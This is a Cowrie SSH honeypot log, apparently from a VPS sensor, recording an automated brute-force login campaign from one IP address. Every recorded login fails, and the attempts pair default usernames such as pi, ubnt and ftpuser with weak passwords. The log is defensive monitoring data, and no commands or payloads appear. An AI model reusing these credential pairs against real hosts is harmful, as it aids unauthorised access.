{"eventid":"cowrie.login.failed","username":"pi","password":"p@ssw0rd","message":"login attempt [pi/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:45.713746Z","src_ip":"87.120.191.13","session":"a391201fdb38"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.008840Z","src_ip":"87.120.191.13","session":"a77e4b55a7b1"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39352,"dst_ip":"1.2.3.4","dst_port":22,"session":"557b4e9b6ec8","protocol":"ssh","message":"New connection: 87.120.191.13:39352 (1.2.3.4:22) [session: 557b4e9b6ec8]","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.028021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.029031Z","src_ip":"87.120.191.13","session":"557b4e9b6ec8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.049166Z","src_ip":"87.120.191.13","session":"557b4e9b6ec8"}
{"eventid":"cowrie.login.failed","username":"noc","password":"p@ssw0rd","message":"login attempt [noc/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.111081Z","src_ip":"87.120.191.13","session":"557b4e9b6ec8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39276,"dst_ip":"1.2.3.4","dst_port":22,"session":"33c9ebaedbe3","protocol":"ssh","message":"New connection: 87.120.191.13:39276 (1.2.3.4:22) [session: 33c9ebaedbe3]","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.347409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.348252Z","src_ip":"87.120.191.13","session":"33c9ebaedbe3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.369473Z","src_ip":"87.120.191.13","session":"33c9ebaedbe3"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"p@ssw0rd","message":"login attempt [ftpuser/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.433846Z","src_ip":"87.120.191.13","session":"33c9ebaedbe3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.667374Z","src_ip":"87.120.191.13","session":"cc2f7f6e044a"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39400,"dst_ip":"1.2.3.4","dst_port":22,"session":"d12a3a138dd9","protocol":"ssh","message":"New connection: 87.120.191.13:39400 (1.2.3.4:22) [session: d12a3a138dd9]","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.686577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.687441Z","src_ip":"87.120.191.13","session":"d12a3a138dd9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.698471Z","src_ip":"87.120.191.13","session":"295e248cc488"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.709157Z","src_ip":"87.120.191.13","session":"d12a3a138dd9"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39408,"dst_ip":"1.2.3.4","dst_port":22,"session":"82c38a35c6ee","protocol":"ssh","message":"New connection: 87.120.191.13:39408 (1.2.3.4:22) [session: 82c38a35c6ee]","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.717602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.718395Z","src_ip":"87.120.191.13","session":"82c38a35c6ee"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.735127Z","src_ip":"87.120.191.13","session":"a391201fdb38"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.738347Z","src_ip":"87.120.191.13","session":"82c38a35c6ee"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39418,"dst_ip":"1.2.3.4","dst_port":22,"session":"712ad7a7f891","protocol":"ssh","message":"New connection: 87.120.191.13:39418 (1.2.3.4:22) [session: 712ad7a7f891]","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.754358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.755870Z","src_ip":"87.120.191.13","session":"712ad7a7f891"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin123","message":"login attempt [ubnt/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.771354Z","src_ip":"87.120.191.13","session":"d12a3a138dd9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.776094Z","src_ip":"87.120.191.13","session":"712ad7a7f891"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.800717Z","src_ip":"87.120.191.13","session":"82c38a35c6ee"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin123","message":"login attempt [pi/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:46.839178Z","src_ip":"87.120.191.13","session":"712ad7a7f891"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.133237Z","src_ip":"87.120.191.13","session":"557b4e9b6ec8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39420,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2876108e5a5","protocol":"ssh","message":"New connection: 87.120.191.13:39420 (1.2.3.4:22) [session: d2876108e5a5]","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.152364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.153174Z","src_ip":"87.120.191.13","session":"d2876108e5a5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.173397Z","src_ip":"87.120.191.13","session":"d2876108e5a5"}
{"eventid":"cowrie.login.failed","username":"noc","password":"admin123","message":"login attempt [noc/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.234201Z","src_ip":"87.120.191.13","session":"d2876108e5a5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.456391Z","src_ip":"87.120.191.13","session":"33c9ebaedbe3"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39428,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef3643956fce","protocol":"ssh","message":"New connection: 87.120.191.13:39428 (1.2.3.4:22) [session: ef3643956fce]","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.475537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.476378Z","src_ip":"87.120.191.13","session":"ef3643956fce"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.497048Z","src_ip":"87.120.191.13","session":"ef3643956fce"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.561725Z","src_ip":"87.120.191.13","session":"ef3643956fce"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.792719Z","src_ip":"87.120.191.13","session":"d12a3a138dd9"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39432,"dst_ip":"1.2.3.4","dst_port":22,"session":"38660a058046","protocol":"ssh","message":"New connection: 87.120.191.13:39432 (1.2.3.4:22) [session: 38660a058046]","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.812112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.812928Z","src_ip":"87.120.191.13","session":"38660a058046"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.823427Z","src_ip":"87.120.191.13","session":"82c38a35c6ee"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.834934Z","src_ip":"87.120.191.13","session":"38660a058046"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39446,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f135c9257a4","protocol":"ssh","message":"New connection: 87.120.191.13:39446 (1.2.3.4:22) [session: 9f135c9257a4]","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.855137Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.860766Z","src_ip":"87.120.191.13","session":"712ad7a7f891"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.861937Z","src_ip":"87.120.191.13","session":"9f135c9257a4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.877768Z","src_ip":"87.120.191.13","session":"9f135c9257a4"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":39452,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac2297b9d7cc","protocol":"ssh","message":"New connection: 87.120.191.13:39452 (1.2.3.4:22) [session: ac2297b9d7cc]","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.880250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.881105Z","src_ip":"87.120.191.13","session":"ac2297b9d7cc"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1234567890","message":"login attempt [ubnt/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.900518Z","src_ip":"87.120.191.13","session":"38660a058046"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.901623Z","src_ip":"87.120.191.13","session":"ac2297b9d7cc"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567890","message":"login attempt [ftpuser/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.961033Z","src_ip":"87.120.191.13","session":"9f135c9257a4"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567890","message":"login attempt [pi/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-26T13:58:47.972050Z","src_ip":"87.120.191.13","session":"ac2297b9d7cc"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:58:48.257327Z","src_ip":"87.120.191.13","session":"d2876108e5a5"}
